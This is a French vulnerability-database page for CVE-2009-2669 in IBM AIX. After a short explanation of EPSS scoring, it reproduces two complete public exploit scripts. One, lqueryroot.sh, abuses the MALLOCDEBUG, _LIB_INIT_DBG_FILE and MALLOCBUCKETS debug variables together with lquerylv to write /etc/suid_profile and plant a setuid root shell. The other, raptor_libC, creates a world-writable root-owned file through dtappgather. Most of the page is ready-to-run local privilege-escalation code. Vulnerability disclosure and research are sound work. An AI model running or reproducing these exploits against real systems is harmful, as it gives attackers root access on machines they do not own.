CVE-2009-2669 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/sh # # AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) # # This exploit takes advantage of known issues with debugging functions # within the AIX linker library. We are taking advantage of known # functionality, and focusing on badly coded SUID binaries which do not # adhere to proper security checks prior to seteuid/open/writes. # # The CVEs we will be taking advantage of: # - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows # local users to create or overwrite arbitrary files via a symlink attack on # the log file associated with the MALLOCDEBUG environment variable. # # - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does # not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE # environment variables, which allows local users to gain privileges by # leveraging a setuid-root program to create an arbitrary root-owned file # with world-writable permissions, related to libC.a (aka the XL C++ runtime # library) in AIX 5.3 and libc.a in AIX 6.1. # # - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary # File Writes In IBM AIX. # # In each instance of the aforementioned CVEs, IBM merely patched the binaries # which were reported in the original reports as being used for escalation of # the vulnerabilities. This allowed for the lquerylv binary to slip by their # patches and become an attack vector. # # Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ # # lqueryroot.sh by @hxmonsegur [2016 //RSL] ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') APP=$0 function usage { echo "Usage: $APP [1] | [2] | [3]" echo echo "1 - MALLOCDEBUG file write -> escalation" echo "2 - _LIB_INIT_DBG_FILE file write -> escalation" echo "3 - MALLOCBUCKETS file write -> escalation" echo echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL" exit } function CVE20091786 { echo "[*] Exporting MALLOCDEBUG environment variable" MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/etc/suid_profile export MALLOCTYPE MALLOCDEBUG } function CVE20092669 { echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable" _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/etc/suid_profile export _LIB_INIT_DBG _LIB_INIT_DBG_FILE } function CVE20143074 { echo "[*] Exporting MALLOCBUCKETS environment variable" MALLOCOPTIONS=buckets MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile export MALLOCOPTIONS MALLOCBUCKETS } if [ -z "$1" ]; then usage exit 1 fi while [ "$1" != "" ]; do case $1 in 1 ) CVE20091786;; 2 ) CVE20092669;; 3 ) CVE20143074;; * ) usage break;; esac shift done if [ ! -x "/usr/sbin/lquerylv" ]; then echo "[-] lquerylv isn't executable. Tough luck." exit 1 fi echo "[*] Setting umask to 000" umask 000 echo "[*] Execute our vulnerable binary" /usr/sbin/lquerylv >/dev/null 2>&1 if [ ! -e "/etc/suid_profile" ]; then echo "[-] /etc/suid_profile does not exist and exploit failed." exit 1 fi echo "[*] Cleaning up /etc/suid_profile" echo > /etc/suid_profile echo "[*] Current id: `/usr/bin/id`" echo "[*] Adding payload" cat << EOF >/etc/suid_profile cp /bin/ksh $ROOTSHELL /usr/bin/syscall setreuid 0 0 chown root:system $ROOTSHELL chmod 6755 $ROOTSHELL rm /etc/suid_profile EOF echo "[*] Unsetting env" unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE echo "[*] Executing ibstat for fun and profit" /usr/bin/ibstat -a >/dev/null 2>&1 if [ ! -e "$ROOTSHELL" ]; then echo "[-] Rootshell does not exist and exploit failed." exit 1 fi echo "[*] Executing rootshell" $ROOTSHELL

#!/bin/sh # # $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $ # # raptor_libC - AIX arbitrary file overwrite via libC debug # Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net> # # Property of @ Mediaservice.net Srl Data Security Division # http://www.mediaservice.net/ http://lab.mediaservice.net/ # # *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING *** # # A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle # the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which # allows local users to gain privileges by leveraging a setuid-root program to # create an arbitrary root-owned file with world-writable permissions, related # to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1 # (CVE-2009-2669). # # Typical privilege escalation techniques via arbitrary file creation don't # seem to work on recent AIX versions: .rhosts is ignored if it is group or # world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; # /var/spool/cron/atjobs seems useless as well, since we cannot open cron's # named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come # to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, # /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d. # # See also: http://milw0rm.com/exploits/9306 # # Usage: # $ uname -a # AIX rs6000 3 5 0052288E4C00 # $ lslpp -L xlC.rte | grep xlC.rte # xlC.rte 9.0.0.1 C F XL C/C++ Runtime # $ chmod +x raptor_libC # $ ./raptor_libC /bin/bobobobobob # [...] # -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob # # Vulnerable platforms (AIX 5.3): # xlC.rte < 8.0.0.0 [untested] # xlC.rte 8.0.0.0-8.0.0.14 [untested] # xlC.rte 9.0.0.0-9.0.0.9 [tested] # xlC.rte 10.1.0.0-10.1.0.2 [untested] # # Vulnerable platforms (AIX 6.1): # bos.rte.libc 6.1.0.0-6.1.0.11 [untested] # bos.rte.libc 6.1.1.0-6.1.1.6 [untested] # bos.rte.libc 6.1.2.0-6.1.2.5 [untested] # bos.rte.libc 6.1.3.0-6.1.3.2 [untested] # bos.adt.prof 6.1.0.0-6.1.0.10 [untested] # bos.adt.prof 6.1.1.0-6.1.1.5 [untested] # bos.adt.prof 6.1.2.0-6.1.2.4 [untested] # bos.adt.prof 6.1.3.0-6.1.3.1 [untested] # echo "raptor_libC - AIX arbitrary file overwrite via libC debug" echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>" echo # check the arguments if [ -z "$1" ]; then echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***" echo echo "Usage: $0 <filename>" echo exit fi # prepare the environment _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=$1 export _LIB_INIT_DBG _LIB_INIT_DBG_FILE # gimme -rw-rw-rw-! umask 0 # setuid program linked to /usr/lib/libC.a /usr/dt/bin/dtappgather # other good setuid targets # /usr/dt/bin/dtprintinfo # /opt/IBMinvscout/bin/invscoutClient_VPD_Survey # check the created file ls -l $_LIB_INIT_DBG_FILE echo # milw0rm.com [2009-09-11]